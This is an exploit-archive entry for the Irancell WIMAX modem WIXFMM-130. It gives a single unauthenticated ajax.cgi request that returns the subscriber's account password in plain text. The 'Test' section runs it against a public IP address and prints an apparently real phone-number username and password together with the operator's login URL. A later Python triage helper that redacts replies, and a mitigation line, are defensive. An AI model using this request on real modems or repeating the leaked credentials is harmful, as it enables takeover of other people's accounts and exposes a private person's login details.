Irancell WIMAX Modem WIXFMM-130 CSRF Accounting User Password Viewer Vulnerability

2016-12-25T00:00:00
ID 1337DAY-ID-26579
Type zdt
Reporter meisamrce
Modified 2016-12-25T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
# Exploit Title: Irancell WIMAX Modem [WIXFMM-130] CSRF Accounting User Password Viewer
# Vendor Homepage: http://wimax.irancell.ir/Portal/Home/
# Version: WIXFMM-130

Exploit :  http://192.168.1.1/ajax.cgi?action=tag_init_wimax_auth.php

Result :

1;1;0;[username]@mtnirancell.com;[password];[email protected];0;1;0;1;1;;[email protected];[email protected];1;1;0

Login Page : https://ecare.irancell.ir/appmanager/sspportal/login
Choose Language : English
Login Type : WIMAX
Username : username
Password : password

Test : http://2.144.196.10/ajax.cgi?action=tag_init_wimax_auth.php

Result : 

1;1;0;[email protected];RjdHUwiN;[email protected];0;1;0;1;1;;[email protected];[email protected];1;1;0

Login Url : https://ecare.irancell.ir/appmanager/sspportal/login
Choose Language : English
Login Type : WIMAX
Username : 09411344375
Password : RjdHUwiN
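
Added example, not part of the original advisory: a triage helper for owners of a WIXFMM-130 that classifies a reply from the ajax.cgi endpoint above and redacts the account fields before the result goes into a ticket. The field positions are taken from the "Result" line on this page; the function names and the sample replies are constructed for illustration, and the status/body are assumed to come from a request made without a login session to your own modem.

```python
# Added example: field positions follow the "Result" line on this page
# (0-based): index 3 is the account username, index 4 the password.
USER_IDX, PASS_IDX = 3, 4


def redact(fields):
    """Return the reply with the account name masked and the password removed."""
    out = list(fields)
    _, sep, domain = out[USER_IDX].partition("@")
    out[USER_IDX] = "***" + sep + domain
    out[PASS_IDX] = "<redacted>"
    return ";".join(out)


def audit_response(status, body):
    """Classify one reply to ajax.cgi?action=tag_init_wimax_auth.php.

    status/body are assumed to come from a request sent WITHOUT a login
    session to a modem you administer. Returns (exposed, reason, safe_text).
    """
    text = body.strip()
    if status != 200:
        return (False, "HTTP %d: endpoint refused the request" % status, "")
    if text.startswith("<"):
        return (False, "HTML returned (login or error page), no account data", "")
    fields = text.split(";")
    if len(fields) <= PASS_IDX:
        return (False, "unexpected format: %d fields" % len(fields), "")
    if not fields[PASS_IDX]:
        return (False, "password field is empty", redact(fields))
    return (True, "account password returned without authentication", redact(fields))


# Constructed sample replies (not captured from any device).
SAMPLES = {
    "vulnerable": (200, "1;1;0;testuser@mtnirancell.com;ExamplePw1;a@example.invalid;"
                        "0;1;0;1;1;;a@example.invalid;a@example.invalid;1;1;0\n"),
    "refused": (401, "Unauthorized"),
    "login_page": (200, "<html><body>Login</body></html>"),
}

if __name__ == "__main__":
    for name, (status, body) in SAMPLES.items():
        exposed, reason, safe = audit_response(status, body)
        print(name, "EXPOSED" if exposed else "ok", "-", reason, safe)
```

A device reported as exposed should have its management interface blocked from the WAN side, and the account password should be changed through the operator once the endpoint no longer answers unauthenticated requests.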


#  0day.today [2018-04-11]  #